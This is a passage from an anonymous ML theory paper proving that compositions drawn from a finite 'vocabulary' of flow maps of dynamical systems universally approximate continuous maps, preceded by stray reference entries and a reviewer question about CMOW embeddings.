Mor Geva, Avi Caciularu, Kevin Wang, and Yoav Goldberg. Transformer feed-forward layers build predictions by promoting concepts in the vocabulary space. In *Proceedings of the 2022 Conference on Empirical Methods in Natural Language Processing*, pp. 30–45, 2022.

Google. Palm 2 technical report. Google AI, 2023. URL [https://ai.google/static/documents/palm2techreport.pdf](https://ai.google/static/documents/palm2techreport.pdf).

Stanislaw Jastrzebski, Devansh Arpit, Nicolas Ballas, Vikas Verma, Tong Che, and Yoshua Bengio. Residual connections encourage iterative inference. *arXiv preprint arXiv:1710.04773*, 2017.

Andrej Karpathy. GitHub - karpathy/nanoGPT: The simplest, fastest repository for training/finetuning medium-sized GPTs, 2023. URL [https://github.com/karpathy/nanoGPT](https://github.com/karpathy/nanoGPT).

Dmitry Kobak and George C Linderman. Initialization is critical for preserving global data structure in both t-sne and umap. *Nature biotechnology*, 39(2):156–157, 2021.
UVb0g26xyH
CMOW is a simple sentence embedding method that represents every word as a matrix and composes the words in a sentence via matrix multiplication. Hence, CMOW dynamically builds a linear deep neural network. Could you comment on how far this relates to the idea, raised in your conclusion, of constructing novel NLP models by embedding every word as a function?
VOCABULARY FOR UNIVERSAL APPROXIMATION: A LINGUISTIC PERSPECTIVE OF MAPPING COMPOSITIONS

Anonymous authors Paper under double-blind review

ABSTRACT

In recent years, deep learning-based sequence models, such as language models, have received much attention and achieved great success, which has pushed researchers to explore the possibility of transforming non-sequential problems into a sequential form. Following this thought, deep neural networks can be represented as composite functions of a sequence of mappings, linear or nonlinear, where each composition can be viewed as a word. However, the weights of the linear mappings are undetermined and hence would require an infinite number of words. In this article, we investigate the finite case and constructively prove the existence of a finite vocabulary $V = \{\phi_i : \mathbb{R}^d \to \mathbb{R}^d | i = 1, ..., n\}$ with $n = O(d^2)$ for the universal approximation. That is, for any continuous mapping $f : \mathbb{R}^d \to \mathbb{R}^d$, compact domain $\Omega$ and $\varepsilon > 0$, there is a sequence of mappings $\phi_{i_1}, ..., \phi_{i_m} \in V, m \in \mathbb{Z}_+$, such that the composition $\phi_{i_m} \circ ... \circ \phi_{i_1}$ approximates $f$ on $\Omega$ with an error less than $\varepsilon$. Our results demonstrate an unusual approximation power of mapping compositions, reminiscent of compositionality in linguistics: the idea that a finite vocabulary of basic elements can be combined via grammar to express an infinite range of meanings.

1 INTRODUCTION

Cognitive psychologists and linguists have long recognized the importance of languages (Pinker, 2003), which has been further highlighted by the popularity of language models such as BERT (Devlin et al., 2018) and GPT (Brown et al., 2020). These models, based on RNNs or Transformers, have revolutionized natural language processing by transforming it into a sequence learning problem. They can handle the long-term dependencies in text and generate coherent text based on the previous content, making them invaluable tools in language understanding and generation (Vaswani et al., 2017). The success of these models has also led to a new approach to solving non-sequential problems by transforming them into sequential ones. For instance, image processing can be turned into a sequence learning problem by segmenting an image into small blocks, arranging them in a certain order, and then processing the resulting sequence using sequence learning algorithms to achieve image recognition (Dosovitskiy et al., 2021). The use of sequence learning algorithms has also been extended to reinforcement learning (Chen et al., 2021): for example, the decision transformer outputs optimal actions by leveraging a causally masked transformer and exceeds state-of-the-art performance. Sequence modeling has opened up new possibilities for solving a wide range of problems, and this trend seems to hold in the field of theoretical research.

As is well known, artificial neural networks have universal approximation capabilities, and wide or deep feedforward networks can approximate continuous functions on a compact domain arbitrarily well (Cybenko, 1989; Hornik et al., 1989; Leshno et al., 1993). However, in practical applications such as AlphaFold (Jumper et al., 2021), BERT (Devlin et al., 2018) and GPT (Brown et al., 2020), the residual network structures (He et al., 2016a,b) are preferred over the feedforward structures.
It is observed that residual networks (ResNets) are forward Euler discretizations of dynamical systems (E, 2017; Sander et al., 2022), and this relationship has spawned a series of dynamical system-based neural network structures such as the neural ODE (Chen et al., 2018). The dynamical system-based neural network structures are expected to play an important role in various fields. Notably, both the language models and the dynamical systems are linked to time series modeling and have been effectively applied to non-sequential problems. This observation naturally leads us to question: *is there an intricate relationship between their individual successes?*

This article aims to ponder this question. Through a comparative study, we obtain some initial results from the perspective of universal approximation. Specifically, we demonstrate that there exists a finite set of mappings, referred to as the vocabulary $V$, chosen as flow maps of autonomous dynamical systems $x'(t) = f(x(t))$, such that any continuous mapping can be approximated by composing a sequence of mappings from the vocabulary $V$. This bears a resemblance to the way complex information is conveyed in natural language through constructing phrases, sentences, and ultimately paragraphs and compositions. Table 1 provides an intuitive representation of this similarity.

| | English | Flow maps of dynamical systems‡ |
|---|---------|--------------------------------|
| Vocabulary | $\sim 140{,}000$† | $O(d^2)$ |
| Word | I, you, am, is, are, apple, banana, car, buy, do, have, blue, red, ... | $\phi_{\pm e_1}^\tau, \phi_{\pm e_2}^\tau, ..., \phi_{\pm e_d}^\tau, \phi_{\pm E_{11}x}^\tau, \phi_{\pm E_{12}x}^\tau, \phi_{\pm E_{21}x}^\tau, ..., \phi_{\pm E_{dd}x}^\tau, \phi_{\pm \text{ReLU}(x)}^\tau$, ... |
| Phrase | A big deal, easier said than done, time waits for no man, ... | $\phi_{e_1}^\tau \bullet \phi_{-e_2}^\tau$, $\phi_{e_1}^\tau \bullet \phi_{E_{11}x}^\tau \bullet \phi_{\text{ReLU}(x)}^\tau$, ... |
| Sentence | It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, ... | $\phi_{e_3}^\tau \bullet \phi_{\text{ReLU}(x)}^\tau \bullet \phi_{-E_{21}x}^\tau \bullet \phi_{\text{ReLU}(x)}^\tau \bullet \phi_{E_{23}x}^\tau \bullet \phi_{-e_2}^\tau \bullet \phi_{\text{ReLU}(x)}^\tau \bullet \phi_{E_{11}x}^\tau \bullet \phi_{e_1}^\tau$, ... |

† The number of words, phrases, and meanings in the Cambridge Advanced Learner's Dictionary.
‡ Notations are provided in Section 2.

### 1.1 Contributions

1. We proved that it is possible to achieve the universal approximation property by composing a sequence of mappings in a finite set $V$ (Theorem 2.2 and Corollary 2.3).
2. Our proof is constructive, as we designed such a $V$ that contains a finite number of flow maps of dynamical systems (Theorem 2.6).

### 1.2 Related works

**Universal approximation.** The approximation properties of neural networks have been extensively studied, with previous studies focusing on the approximation properties of network structures such as feedforward neural networks (Cybenko, 1989; Hornik et al., 1989; Leshno et al., 1993) and residual networks (He et al., 2016a,b). In these networks, the structure is fixed and the weights are adjusted to approximate target functions. Although this paper also considers universal approximation properties, we take a completely different approach: we use a finite set of mappings, and universal approximation is achieved by composing sequences of these mappings.
The length of the mapping sequence is variable, which is similar to networks with a fixed width and variable depth (Lu et al., 2017; Johnson, 2019; Kidger & Lyons, 2020; Park et al., 2021; Beise & Da Cruz, 2020; Cai, 2022). However, in our study, we do not consider learnable weights; instead, we consider the composition sequence, which differs from previous research.

**Residual network, neural ODE, and control theory.** The word mappings constructed in this paper are partially based on the numerical discretization of dynamical systems and therefore have a relationship with residual networks and neural ODEs. Residual networks (He et al., 2016a,b) are currently one of the most popular network structures and can be viewed as a forward Euler discretization of neural ODEs (Chen et al., 2018). Recently, Li et al. (2022) and Tabuada & Gharesifard (2020; 2022) studied the approximation properties of neural ODEs. Their basic idea is to employ controllability results from control theory to construct source terms that approximate a given finite number of input-output pairs, thus obtaining approximation properties for functions in the $L^p$ norm or continuous norm sense. Additionally, Duan et al. (2022) proposed an operator splitting scheme that discretizes neural ODEs into leaky-ReLU fully connected networks. Partially inspired by Duan et al.'s construction, we designed a special splitting method to finish Part 1 of our construction. It is worth noting that all the neural networks mentioned above can be represented as compositions of mapping sequences. However, these networks involve an infinite number of possible mappings, whereas our construction requires only a finite number.

**Compositionality.** Our results demonstrate that composition is a powerful operator that allows us to achieve the universal approximation property on compact domains using a finite number of mappings. This is a little similar to the concept of compositionality in linguistics, especially in the Montagovian framing (Montague, 1970; Kracht, 2012), which is the idea that a finite vocabulary of basic elements can be combined via a grammar to express an infinite range of meanings. Recently, researchers have explored the capability of neural models to acquire compositionality while learning from data (Dankers et al., 2022; Valvoda et al., 2022). However, they focused on algebraic relations rather than approximations. It would be interesting to explore whether these studies and ours can be connected.

**Word embedding.** The finite mapping vocabulary might be related to word embedding in natural language processing. The most basic model embeds words as vectors and then sums these word vectors to obtain the sentence vector (Mikolov et al., 2013). However, the summation operator is commutative, and thus vector embedding models fail to capture any notion of word order. To address this limitation, Rudolph & Giesbrecht (2010) proposed modeling words as matrices rather than vectors and composing sentence embeddings through matrix multiplication instead of addition. For recent advancements in this direction, we refer to Mai et al. (2018); Asaad et al. (2023). It is noteworthy that, to the best of our knowledge, prior research in this domain has not delved into approximation properties. Leveraging the techniques presented in this paper, we can readily establish the existence of a finite vocabulary for both vector embedding and matrix embedding (refer to Appendix D).
Furthermore, it is important to note that vector space and matrix space are finite-dimensional, while the continuous function space is infinite-dimensional. This suggests that embedding words as nonlinear mappings could enhance the expressiveness of sentences. However, there is limited exploration in this direction. ### 1.3 Outline We state the main result for universal approximation in Section 2, which includes notations, main theorems, and ideas for construction and proof. Before providing the detailed construction in Section 4, we add a Section 3 to introduce flow maps and the techniques we used. Finally, in Section 5 we discuss the result of this paper. All formal proof of the theorems is provided in the Appendix. ## 2 Notations and Main Results ### 2.1 Preliminaries The statement and the proof of our main results contain some concepts in mathematics. Here we provide a brief introduction for them, which is enough to understand most parts of this paper. One concept is the orientation-preserving (OP) diffeomorphisms of $\mathbb{R}^d$. A differentiable map $f : \mathbb{R}^d \to \mathbb{R}^d$ is called a diffeomorphism if it is a bijection and its inverse $f^{-1}$ is differentiable as well. In addition, a diffeomorphism $f$ of $\mathbb{R}^d$ is called orientation-preserving if the Jacobian of $f$ is positive everywhere. A simple example of OP diffeomorphisms is the linear map $f : x \to Px$ where $x \in \mathbb{R}^d$ and $P$ is a square matrix with positive determinant. Another concept is the flow map of dynamical systems. Here the dynamical system is characterized by the following ordinary differential equation (ODE) in dimension $d$, $$\begin{align*} \dot{x}(t) &= v(x(t), t), \quad t \in (0, \tau), \\ x(0) &= x_0 \in \mathbb{R}^d, \end{align*}$$ where $v : \mathbb{R}^d \to \mathbb{R}^d$ is the velocity field and $x_0$ is the initial value. When the field $v$ satisfies some conditions, such as Lipschitz continuous, the ODE (1) has a unique solution $x(t), t \in [0, \tau]$. Then the map from the initial state $x_0$ to $x(\tau)$, the state of the system after time $\tau$, is called the flow map. and denoted by \( \phi_{v(x,t)}^\tau(x_0) \), where \( x_0 \) is allowed to vary. A basic property is that the flow maps are naturally OP diffeomorphisms. For example, let \( A \) be a square matrix and \( v(x,t) = Ax \), then the flow map \( \phi_{v(x,t)}^\tau(x_0) \) is a linear map \( \phi_{Ax}^\tau(x_0) = e^{A\tau}x_0 \), where \( e^{A\tau} \) is the matrix exponential of \( A\tau \). A deeper introduction and understanding of flows and dynamical systems can be found in Chapter 1 of [Arrowsmith & Place, 1990]. ### 2.2 Notations For a (vector valued) function class \( F \), the vocabulary \( V \) is defined as a finite subset of \( F \), i.e., \[ V = \{ \phi_1, \phi_2, ..., \phi_n \} \subset F, \quad n \in \mathbb{Z}_+. \] (2) Each \( \phi_i \in V \) is called a word. We will consider a sequence of functions, \( \phi_{i_1}, \phi_{i_2}, ..., \phi_{i_m} \in V \), and their composition, called as a sentence, to generate the hypothesis function space, \[ H_V = \{ \phi_{i_1} \bullet \phi_{i_2} \bullet ... \bullet \phi_{i_m} | \phi_{i_1}, \phi_{i_2}, ..., \phi_{i_m} \in V, m \in \mathbb{Z}_+ \}. \] (3) Particularly, some (short) sentences are called phrases for some purpose. Here the operator \( \bullet \) is defined as function composition from left to right, which aligns the composition order to the writing order, i.e. \[ \phi_{i_1} \bullet \phi_{i_2} \bullet ... 
$$\phi_{i_1} \bullet \phi_{i_2} \bullet \cdots \bullet \phi_{i_m} = \phi_{i_m} \circ \cdots \circ \phi_{i_2} \circ \phi_{i_1} = \phi_{i_m}(\cdots(\phi_{i_2}(\phi_{i_1}(\cdot)))\cdots).$$ (4)
In addition, we use $\phi^{\bullet m}$ to denote the composition of $\phi$ with itself $m$ times.

In this paper, we consider two function classes: (1) $C(\mathbb{R}^d, \mathbb{R}^d)$, the continuous functions from $\mathbb{R}^d$ to $\mathbb{R}^d$; (2) $\text{Diff}_0(\mathbb{R}^d)$, the OP diffeomorphisms of $\mathbb{R}^d$. In particular, we restrict the functions to a compact domain $\Omega \subset \mathbb{R}^d$ and define the universal approximation property as follows.

**Definition 2.1** (Universal approximation property, UAP). For a compact domain $\Omega$ in dimension $d$, a target function space $F$, and a hypothesis space $H$, we say

1. $H$ has $C$-UAP for $F$ if for any $f \in F$ and $\varepsilon > 0$, there is a function $h \in H$ such that
$$\| f(x) - h(x) \| < \varepsilon, \quad \forall x \in \Omega.$$
2. $H$ has $L^p$-UAP for $F$ if for any $f \in F$ and $\varepsilon > 0$, there is a function $h \in H$ such that
$$\| f - h \|_{L^p(\Omega)} = \left( \int_\Omega |f(x) - h(x)|^p dx \right)^{1/p} < \varepsilon, \quad p \in [1, +\infty).$$

### 2.3 Main theorem

Our main result is Theorem 2.2 and its Corollary 2.3, which show the existence of a finite function vocabulary $V$ with the universal approximation property.

**Theorem 2.2.** Let $\Omega \subset \mathbb{R}^d$ be a compact domain. Then there is a finite set $V \subset \text{Diff}_0(\mathbb{R}^d)$ such that the hypothesis space $H_V$ in Eq. (3) has $C$-UAP for $\text{Diff}_0(\mathbb{R}^d)$.

**Corollary 2.3.** Let $\Omega \subset \mathbb{R}^d$ be a compact domain, $d \geq 2$ and $p \in [1, +\infty)$. Then there is a finite set $V \subset C(\mathbb{R}^d, \mathbb{R}^d)$ such that the hypothesis space $H_V$ in Eq. (3) has $L^p$-UAP for $C(\mathbb{R}^d, \mathbb{R}^d)$.

Corollary 2.3 is based on the fact that OP diffeomorphisms can approximate continuous functions in the $L^p$ norm provided the dimension is at least two (Brenier & Gangbo, 2003). Hence, it remains to prove Theorem 2.2.

**Remark 2.4.** For simplicity, we consider functions whose input and output dimensions coincide. Our results can be directly extended to the case of different input and output dimensions. In fact, for $f \in C(\mathbb{R}^{d_x}, \mathbb{R}^{d_y})$, one can lift it to a function $\tilde{f} \in C(\mathbb{R}^d, \mathbb{R}^d)$ with some $d \geq \max(d_x, d_y)$; for example, let $f = A_{in} \bullet \tilde{f} \bullet A_{out}$, where $A_{in} \in C(\mathbb{R}^{d_x}, \mathbb{R}^d)$ and $A_{out} \in C(\mathbb{R}^d, \mathbb{R}^{d_y})$ are two fixed affine mappings.

2.4 Sketch of the proof

Our proof of Theorem 2.2 is constructive and based on the flow maps of ODEs.
In particular, our construction uses the following classes of candidate flow maps in dimension $d$:
$$H_1 = \{ \phi^\tau_{Ax+b} \mid A \in \mathbb{R}^{d \times d}, b \in \mathbb{R}^d, \tau \geq 0 \} \equiv \{ \phi : x \to e^{\tilde{A}}x + \tilde{b} \mid \tilde{A} \in \mathbb{R}^{d \times d}, \tilde{b} \in \mathbb{R}^d \},$$ (5)
$$H_2 = \{ \phi^\tau_{\Sigma_{\alpha,\beta}(x)} \mid \alpha, \beta \in \mathbb{R}^d, \tau \geq 0 \} \equiv \{ \phi : x \to \Sigma_{\tilde{\alpha},\tilde{\beta}}(x) \mid \tilde{\alpha}, \tilde{\beta} \in (0, +\infty)^d \},$$ (6)
where $\Sigma_{\alpha,\beta}$ is the generalized leaky-ReLU function defined below. We call the maps in $H_1$ affine flows and those in $H_2$ leaky-ReLU flows.

**Definition 2.5** (Generalized leaky-ReLU). Define the generalized leaky-ReLU functions $\sigma_{\alpha,\beta} : \mathbb{R} \to \mathbb{R}$ with $\alpha, \beta \in \mathbb{R}$, and $\Sigma_{\alpha,\beta} : \mathbb{R}^d \to \mathbb{R}^d$ with $\alpha = (\alpha_1, ..., \alpha_d) \in \mathbb{R}^d$, $\beta = (\beta_1, ..., \beta_d) \in \mathbb{R}^d$, as
$$\sigma_{\alpha,\beta}(x) = \begin{cases} \alpha x, & x < 0 \\ \beta x, & x \geq 0 \end{cases}, \quad \Sigma_{\alpha,\beta}(x) = (\sigma_{\alpha_1,\beta_1}(x_1), ..., \sigma_{\alpha_d,\beta_d}(x_d)).$$ (7)

Generalized leaky-ReLU functions are piecewise linear. In this notation, the traditional ReLU and leaky-ReLU functions are $\text{ReLU}(x) \equiv \sigma_0(x) \equiv \sigma_{0,1}(x)$ and $\sigma_\alpha(x) \equiv \sigma_{\alpha,1}(x)$ with $\alpha \in (0, 1)$, respectively. For a vector input $x$, we use $\sigma_{\alpha,\beta}$ as an equivalent notation for $\Sigma_{\alpha\mathbf{1},\beta\mathbf{1}}$, where $\mathbf{1} \in \mathbb{R}^d$ is the all-ones vector.

We will show that the following set $V$ meets our requirement for universal approximation:
$$V = \{ \phi^\tau_{\pm e_i}, \phi^\tau_{\pm E_{ij}x}, \phi^\tau_{\pm \Sigma_{e_i,0}(x)}, \phi^\tau_{\pm \Sigma_{0,e_i}(x)} \mid i, j \in \{1, 2, ..., d\}, \ \tau \in \{1, \sqrt{2}\} \},$$ (8)
where $e_i \in \mathbb{R}^d$ is the $i$-th unit coordinate vector and $E_{ij}$ is the $d \times d$ matrix whose entries are all zero except for a 1 at index $(i, j)$. Obviously, $V \subset \text{Diff}_0(\mathbb{R}^d)$ is a finite set with $O(d^2)$ functions.

**Theorem 2.6.** Let $\Psi \in \text{Diff}_0(\Omega)$ be an orientation-preserving diffeomorphism and $\Omega \subset \mathbb{R}^d$ a compact domain. Then, for any $\varepsilon > 0$, there is a sequence of flow maps, $\phi_1, \phi_2, ..., \phi_n \in V, n \in \mathbb{Z}_+$, such that
$$\| \Psi(x) - (\phi_1 \bullet \phi_2 \bullet ... \bullet \phi_n)(x) \| \leq \varepsilon, \quad \forall x \in \Omega.$$ (9)

Theorem 2.6 provides a constructive proof of Theorem 2.2. Its proof can be separated into the following two parts.

**Part 1:** Approximate each flow map in $H_1$ and $H_2$ by composing a sequence of flow maps in $V$.

**Part 2:** Approximate $\Psi \in \text{Diff}_0(\mathbb{R}^d)$ by composing a sequence of flow maps in $H_1 \cup H_2$. In particular, we approximate $\Psi$ by a map $g_L$ of the form
$$g_L = h_0 \bullet h_1^* \bullet h_1 \bullet h_2^* \bullet h_2 \bullet \cdots \bullet h_L^* \bullet h_L, \quad h_i \in H_1, h_i^* \in H_2, L \in \mathbb{Z}_+.$$ (10)

Verifying that this constructed $V$ works is technical and is carried out in Section 3 and Section 4. Here we only explain the main ideas. First, we note that to approximate a composition map $T$, we only need to approximate each component in $T$, as detailed in the following Lemma 2.7.
**Lemma 2.7.** Let the map $T = F_1 \bullet ... \bullet F_n$ be a composition of $n$ continuous functions $F_i$, each defined on an open domain $D_i$, and let $\mathcal{F}$ be a continuous function class that can uniformly approximate each $F_i$ on any compact domain $K_i \subset D_i$. Then, for any compact domain $K \subset D_1$ and $\varepsilon > 0$, there are $n$ functions $\tilde{F}_1, ..., \tilde{F}_n$ in $\mathcal{F}$ such that
$$\| T(x) - \tilde{F}_1 \bullet ... \bullet \tilde{F}_n(x) \| \leq \varepsilon, \quad \forall x \in K.$$

For Part 1, the validation involves three mathematical tools: the Lie product formula (Hall, 2015), the splitting method (Holden et al., 2010), and Kronecker's theorem (Apostol, 1990). We take $\phi_b^1 \in H_1$, $b = \sum_{i=1}^d \beta_i e_i$, $\beta_i \geq 0$, as an example to illustrate the main idea. First, motivated by the Lie product formula or the splitting method, we can approximate $\phi_b^1$ by
$$\phi_b^1 \approx (\phi_{\beta_1 e_1}^{1/n} \bullet \phi_{\beta_2 e_2}^{1/n} \bullet ... \bullet \phi_{\beta_d e_d}^{1/n})^n, \quad n \in \mathbb{Z}_+,$$
with $n$ large enough. Second, each $\phi_{\beta_i e_i}^{1/n}$ can be approximated by
$$\phi_{\beta_i e_i}^{1/n} \approx (\phi_{e_i}^{1})^{p_i} \bullet (\phi_{-e_i}^{\sqrt{2}})^{q_i} \in H_V, \quad p_i, q_i \in \mathbb{Z}_+,$$
where $p_i$ and $q_i$ are non-negative integers such that $|p_i - q_i \sqrt{2} - \beta_i/n|$ is small enough, which is possible by Kronecker's theorem (Apostol, 1990) since $\sqrt{2}$ is an irrational number. Finally, $\phi^1_b$ can be approximated by composing a sequence of flow maps in $V$. The cases of $\phi^\tau_{Ax+b}$ and $\phi^\tau_{\Sigma_{\alpha,\beta}(x)}$ in $H_1$ and $H_2$ can be handled in the same spirit.

For Part 2, we note that the $g_L$ constructed in Eq. (10) resembles a feedforward neural network with width $d$ and depth $L$. The form of $g_L$ is motivated by a recent work of Duan et al. (2022), which proved that vanilla feedforward leaky-ReLU networks with width $d$ can be a discretization of dynamical systems in dimension $d$. However, the affine transformations in general networks are not necessarily OP diffeomorphisms, and one novelty of this paper is refining the technique so that these affine transformations are constructed as flow maps. Importantly, making them flow maps allows us to employ the construction of Part 1.

3 PROOF OF THE CONSTRUCTION PART 1

To warm up, we list the flow maps of some autonomous ODEs below:
$$\dot{x}(t) = b, \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = \phi^t_b(x_0) = x_0 + bt,$$
$$\dot{x}(t) = Ax(t) + b, \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = e^{At}x_0 + \int_0^t e^{A(t-\tau)}b \, d\tau,$$
$$\dot{x}(t) = a\sigma_0(x(t)), \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = \phi^t_{a\sigma_0(x)}(x_0) = e^{at}\sigma_{e^{-at}}(x_0),$$
$$\dot{x}(t) = a\sigma_0(-x(t)), \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = \phi^t_{a\sigma_0(-x)}(x_0) = \sigma_{e^{-at}}(x_0).$$
Here $\sigma_0$ and $\sigma_{e^{-at}}$ are ReLU and leaky-ReLU functions, respectively. Next, we provide some properties for verifying that a given map is an affine flow map in $H_1$ or a leaky-ReLU flow map in $H_2$.

3.1 AFFINE FLOWS AND LEAKY-RELU FLOWS

Consider the affine transformation $P : x \rightarrow Wx + b$ and examine conditions under which $P$ is a flow map.
Generally, if $W$ is nonsingular and has a real matrix logarithm $\ln(W)$, then $P$ is an affine flow map: we can represent $P$ as $P(x) = Wx + b = \phi^1_{Ax+\tilde{b}}(x)$, where $A = \ln(W)$ and $\tilde{b}$ is chosen such that $b = \int_0^1 e^{A(1-\tau)}\tilde{b} \, d\tau$. Since it is hard in general to verify that $\ln(W)$ is a real matrix (Culver, 1966), we instead construct special matrices $W$ for which this is guaranteed. The following properties are useful.

**Proposition 3.1.** (1) Let $Q$ be a nonsingular matrix. If $x \rightarrow Wx$ is an affine flow map, then so are the maps $x \rightarrow QWQ^{-1}x$, $x \rightarrow W^{T}x$, and $x \rightarrow W^{-1}x$. (2) Let $U$ be the upper triangular matrix below with $\lambda > 0$; then the map $x \rightarrow Ux$ is an affine flow map for an arbitrary vector $w_{2:d}$,
$$U = \begin{pmatrix} \lambda & w_{2:d} \\ 0 & I_{d-1} \end{pmatrix}.$$
Here $I_{d-1}$ is the identity matrix of order $d-1$.

Property (1) holds because $\ln(QWQ^{-1}) = Q\ln(W)Q^{-1}$, $\ln(W^T) = \ln(W)^T$, and $\ln(W^{-1}) = -\ln(W)$. Property (2) can be obtained by employing the formula
$$\ln \begin{pmatrix} \lambda & w_{2:d} \\ 0 & I_{d-1} \end{pmatrix} = \begin{pmatrix} \ln(\lambda) & \frac{\ln(\lambda)}{\lambda-1}w_{2:d} \\ 0 & 0 \end{pmatrix}, \quad \lambda \neq 1.$$
When $\lambda = 1$, the formula simplifies to $\ln(U) = U - I_d$.

Next, we consider the leaky-ReLU flow maps. By directly calculating the flow map $\phi^\tau_{\Sigma_{\alpha,\beta}(x)}$ with $\alpha, \beta \in \mathbb{R}^d$, we have
$$\phi^\tau_{\Sigma_{\alpha,\beta}(x)}(x) = \Sigma_{\tilde{\alpha},\tilde{\beta}}(x),$$
where $\tilde{\alpha} = (e^{\tau\alpha_1},...,e^{\tau\alpha_d})$ and $\tilde{\beta} = (e^{\tau\beta_1},...,e^{\tau\beta_d})$. The following property is implied.

**Proposition 3.2.** If $\tilde{\alpha}, \tilde{\beta} \in (0, \infty)^d$, then the map $\Sigma_{\tilde{\alpha},\tilde{\beta}}$ is a leaky-ReLU flow map.

3.2 Application of Lie product formula

**Theorem 3.3** (Lie product formula). For all matrices $A, B \in \mathbb{R}^{d \times d}$, we have
$$e^{A+B} = \lim_{n \to \infty} \left( e^{A/n} e^{B/n} \right)^n = \lim_{n \to \infty} \left( \phi_{Ax}^{1/n} \bullet \phi_{Bx}^{1/n} \right)^n.$$
Here $e^A$ denotes the matrix exponential of $A$, which is also the time-one flow map $\phi^1_{Ax}$ of the autonomous system $x'(t) = Ax(t)$. A proof can be found in Hall (2015), for example, and the formula extends to the multi-component case. The formula can also be derived from the operator splitting approach (Holden et al., 2010), which allows us to obtain the following result.

**Lemma 3.4.** Let $v_i : \mathbb{R}^d \to \mathbb{R}^d, i = 1, 2, ..., m$, be Lipschitz continuous functions, $v = \sum_{i=1}^m v_i$, and $\Omega$ a compact domain. For any $t > 0$ and $\varepsilon > 0$, there is a positive integer $n$ such that the flow map $\phi_v^t$ can be approximated by the composition of the flow maps $\phi_{v_i}^{t/n}$, i.e.,
$$\| \phi_v^t(x) - (\phi_{v_1}^{t/n} \bullet \phi_{v_2}^{t/n} \bullet ... \bullet \phi_{v_m}^{t/n})^n(x) \| < \varepsilon, \quad \forall x \in \Omega.$$

3.3 Application of Kronecker's theorem

**Theorem 3.5** (Kronecker's approximation theorem (Apostol, 1990)). Let $\gamma \in \mathbb{R}$ be an irrational number. Then for any $t \in \mathbb{R}$ and $\varepsilon > 0$, there exist two integers $p$ and $q$ with $q > 0$ such that $|\gamma q + p - t| < \varepsilon$.
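To make Theorem 3.5 concrete before applying it to flows (anticipating Lemma 3.6 below), the following minimal numerical sketch, which is our illustration and not part of the paper's construction, takes a linear field $v(x) = Ax$ so that flow maps reduce to matrix exponentials; the search loop, the scale of $A$, and the use of `scipy.linalg.expm` are implementation assumptions.

```python
import numpy as np
from scipy.linalg import expm

rng = np.random.default_rng(0)
A = 0.02 * rng.standard_normal((3, 3))   # linear field v(x) = Ax, so phi_v^t = expm(t * A)
t = 0.7317                               # target (irrational-looking) time parameter

# Kronecker step: find positive integers p, q with |p - q*sqrt(2) - t| small.
p, q = min(
    ((round(t + q * np.sqrt(2)), q) for q in range(1, 100)),
    key=lambda pq: abs(pq[0] - pq[1] * np.sqrt(2) - t),
)
print(f"p={p}, q={q}, time error = {abs(p - q * np.sqrt(2) - t):.1e}")

# Flow step: apply phi_v^1 p times, then phi_{-v}^{sqrt(2)} q times.
# For linear fields this is a product of matrix exponentials.
approx = np.linalg.matrix_power(expm(-np.sqrt(2) * A), q) @ np.linalg.matrix_power(expm(A), p)
print("flow map error:", np.linalg.norm(approx - expm(t * A)))
```

Enlarging the search range for `q` drives the time error toward zero, and the flow-map error shrinks with it, mirroring the statement of Lemma 3.6.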
Although Kronecker's theorem concerns the approximation of real numbers, we can employ it to approximate the flow map $\phi_v^t$, since the time parameter $t$ is a real number. Choosing $\gamma = -\sqrt{2}$ and approximating $t$ by $p - q\sqrt{2}$, we can approximate $\phi_v^t$ by $\phi_v^{p-q\sqrt{2}}$. For positive $t$, the integer $p$ is positive whenever $q$ is. Then the composition property of flow maps,
$$\phi_v^{p-q\sqrt{2}} = \phi_v^p \bullet \phi_v^{-q\sqrt{2}} = \phi_v^p \bullet \phi_{-v}^{q\sqrt{2}} = (\phi_v^1)^p \bullet (\phi_{-v}^{\sqrt{2}})^q,$$
allows us to prove the following result.

**Lemma 3.6.** Let $v : \mathbb{R}^d \to \mathbb{R}^d$ be a Lipschitz continuous function and $\Omega$ a compact domain. For any $t > 0$ and $\varepsilon > 0$, there exist two positive integers $p$ and $q$ such that the flow map $\phi_v^t$ can be approximated by $(\phi_v^1)^p \bullet (\phi_{-v}^{\sqrt{2}})^q$, i.e.,
$$\| \phi_v^t(x) - (\phi_v^1)^p \bullet (\phi_{-v}^{\sqrt{2}})^q(x) \| < \varepsilon, \quad \forall x \in \Omega.$$

**Corollary 3.7.** For any flow map $h$ in $H_1 \cup H_2$, $\varepsilon > 0$, and compact domain $\Omega \subset \mathbb{R}^d$, there is a sequence $\phi_1, \phi_2, ..., \phi_m$ in $V$ (Eq. (8)) such that
$$\| h(x) - (\phi_1 \bullet \phi_2 \bullet ... \bullet \phi_m)(x) \| < \varepsilon, \quad \forall x \in \Omega.$$

The result is obtained by directly employing Lemma 3.4 and Lemma 3.6 with the following splittings:
$$Ax + b = \sum_{i=1}^d \sum_{j=1}^d a_{ij} E_{ij} x + \sum_{i=1}^d b_i e_i, \quad \Sigma_{\alpha,\beta}(x) = \sum_{i=1}^d \alpha_i \Sigma_{e_i,0}(x) + \sum_{i=1}^d \beta_i \Sigma_{0,e_i}(x).$$

4 PROOF OF THE CONSTRUCTION PART 2

This section shows that OP diffeomorphisms can be approximated by composing a sequence of flow maps in $H_1 \cup H_2$. The construction contains three steps: (1) approximate the OP diffeomorphism by deep compositions using the splitting approach, (2) approximate each splitting component by composing flow maps in $H_1 \cup H_2$, (3) combine the results to finish the construction.

4.1 Approximate the OP diffeomorphism by deep compositions

Employing results of Agrachev & Caponigro (2010) and Caponigro (2011), any OP diffeomorphism $\Psi$ can be approximated by flow maps of ODEs. In particular, we can choose the ODEs as neural ODEs of the form
$$x'(t) = v(x(t), t) = \sum_{i=1}^{N} s_i(t) \sigma(w_i(t) \cdot x(t) + b_i(t)),$$ (27)
where the field function $v$ is a neural network with $N$ hidden neurons, the activation is chosen as the leaky-ReLU function $\sigma = \sigma_\alpha$ for some $\alpha \in (0, 1)$, and $s_i \in \mathbb{R}^d$, $w_i \in \mathbb{R}^d$, and $b_i \in \mathbb{R}$ are piecewise smooth functions of $t$. The universal approximation property of neural networks (Cybenko, 1989) implies that $\Psi$ can be approximated by the flow map $\phi^\tau$ of Eq. (27) for some $\tau > 0$ and $N \in \mathbb{Z}_+$ large enough.

